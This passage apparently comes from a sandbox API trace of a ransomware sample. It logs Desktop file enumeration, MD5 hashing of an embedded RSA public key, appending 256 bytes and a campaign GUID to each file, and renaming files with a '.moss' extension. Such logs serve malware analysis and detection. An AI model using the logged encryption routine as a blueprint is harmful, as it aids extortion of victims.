KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.531] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.532] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.532] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.532] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f030) returned 1 [0169.533] CryptCreateHash (in: hProv=0xd2f030, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.533] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.533] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.533] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.533] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.533] GetLastError () returned 0x0 [0169.534] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.534] CryptReleaseContext (hProv=0xd2f030, dwFlags=0x0) returned 1 [0169.534] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.534] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.534] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.534] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.534] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.534] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b778f8 [0169.535] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x14ba7, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.535] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.536] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.536] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.536] CloseHandle (hObject=0x664) returned 1 [0169.537] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2b10 [0169.537] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x870) returned 0x3b48820 [0169.537] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\W7aD8sWB.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\w7ad8swb.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\W7aD8sWB.mkv.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\w7ad8swb.mkv.moss")) returned 1 [0169.539] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87f9fb50, ftCreationTime.dwHighDateTime=0x1d5da30, ftLastAccessTime.dwLowDateTime=0xcc8dad90, ftLastAccessTime.dwHighDateTime=0x1d5e37a, ftLastWriteTime.dwLowDateTime=0xcc8dad90, ftLastWriteTime.dwHighDateTime=0x1d5e37a, nFileSizeHigh=0x0, nFileSizeLow=0xd532, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="x8FlsC43DAjd6C2EfX.rtf", cAlternateFileName="X8FLSC~1.RTF")) returned 1 [0169.539] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0169.539] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.540] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x8FlsC43DAjd6C2EfX.rtf") returned=".rtf" [0169.540] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x8FlsC43DAjd6C2EfX.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\x8flsc43dajd6c2efx.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.540] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=54578) returned 1 [0169.540] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.543] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xd50c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.543] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.545] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.546] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0xd532, lpOverlapped=0x0) returned 1 [0169.546] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.546] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.546] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.547] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.547] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f0b8) returned 1 [0169.548] CryptCreateHash (in: hProv=0xd2f0b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.548] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.548] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.548] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.548] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.548] GetLastError () returned 0x0 [0169.548] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.548] CryptReleaseContext (hProv=0xd2f0b8, dwFlags=0x0) returned 1 [0169.548] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.548] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.548] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.548] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.549] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.549] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0169.549] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0xd532, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.550] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.550] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.550] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.550] CloseHandle (hObject=0x664) returned 1 [0169.551] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0169.551] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x890) returned 0x3b48820 [0169.552] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x8FlsC43DAjd6C2EfX.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\x8flsc43dajd6c2efx.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\x8FlsC43DAjd6C2EfX.rtf.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\x8flsc43dajd6c2efx.rtf.moss")) returned 1 [0169.554] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd5c40e0, ftCreationTime.dwHighDateTime=0x1d5e2b9, ftLastAccessTime.dwLowDateTime=0x9dbc5c10, ftLastAccessTime.dwHighDateTime=0x1d5d89d, ftLastWriteTime.dwLowDateTime=0x9dbc5c10, ftLastWriteTime.dwHighDateTime=0x1d5d89d, nFileSizeHigh=0x0, nFileSizeLow=0x8ed0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XkOUHUj-1YSOk-XHR0.mkv", cAlternateFileName="XKOUHU~1.MKV")) returned 1 [0169.554] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x50) returned 0x362cc38 [0169.554] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f030 [0169.554] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XkOUHUj-1YSOk-XHR0.mkv") returned=".mkv" [0169.554] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XkOUHUj-1YSOk-XHR0.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xkouhuj-1ysok-xhr0.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0169.554] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=36560) returned 1 [0169.554] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0169.558] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x8eaa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.558] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0169.559] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0169.559] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x8ed0, lpOverlapped=0x0) returned 1 [0169.560] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.560] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0169.560] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.560] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0169.560] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2f0b8) returned 1 [0169.561] CryptCreateHash (in: hProv=0xd2f0b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0169.561] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0169.561] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0169.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0169.562] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0169.562] GetLastError () returned 0x0 [0169.562] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0169.562] CryptReleaseContext (hProv=0xd2f0b8, dwFlags=0x0) returned 1 [0169.562] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0169.562] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0169.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0169.562] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0169.562] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0169.562] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b516f8 [0169.563] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x8ed0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0169.563] WriteFile (in: hFile=0x664, lpBuffer=0xd57fe0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0xd57fe0*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0169.563] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0169.563] WriteFile (in: hFile=0x664, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x401fb50*=0x26, lpOverlapped=0x0) returned 1 [0169.564] CloseHandle (hObject=0x664) returned 1 [0169.567] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2f0b8 [0169.568] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x890) returned 0x3b48820 [0169.568] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XkOUHUj-1YSOk-XHR0.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xkouhuj-1ysok-xhr0.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\XkOUHUj-1YSOk-XHR0.mkv.moss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\xkouhuj-1ysok-xhr0.mkv.moss")) returned 1 [0169.570] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x952bfeb0, ftCreationTime.dwHighDateTime=0x1d5e451, ftLastAccessTime.dwLowDateTime=0x7579f170, ftLastAccessTime.dwHighDateTime=0x1d5dccd, ftLastWriteTime.dwLowDateTime=0x7579f170, ftLastWriteTime.dwHighDateTime=0x1d5dccd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xxuaxzQ", cAlternateFileName="")) returned 1 [0169.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0169.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.570] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa8) returned 0x35e3330 [0169.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b411e8 [0169.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b41590 [0169.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0x3b415f8 [0169.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2b10 [0169.571] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x952bfeb0, ftCreationTime.dwHighDateTime=0x1d5e451, ftLastAccessTime.dwLowDateTime=0x7579f170, ftLastAccessTime.dwHighDateTime=0x1d5dccd, ftLastWriteTime.dwLowDateTime=0x7579f170, ftLastWriteTime.dwHighDateTime=0x1d5dccd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xxuaxzQ", cAlternateFileName="")) returned 0 [0169.571] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0169.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b50 | out: hHeap=0xcd0000) returned 1 [0169.571] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362c768 | out: hHeap=0xcd0000) returned 1 [0169.571] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0169.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71a00 [0169.571] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0169.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.571] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0169.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0169.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0169.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 [0169.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71b38 [0169.572] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0169.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0169.572] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd71b38 | out: hHeap=0xcd0000) returned 1 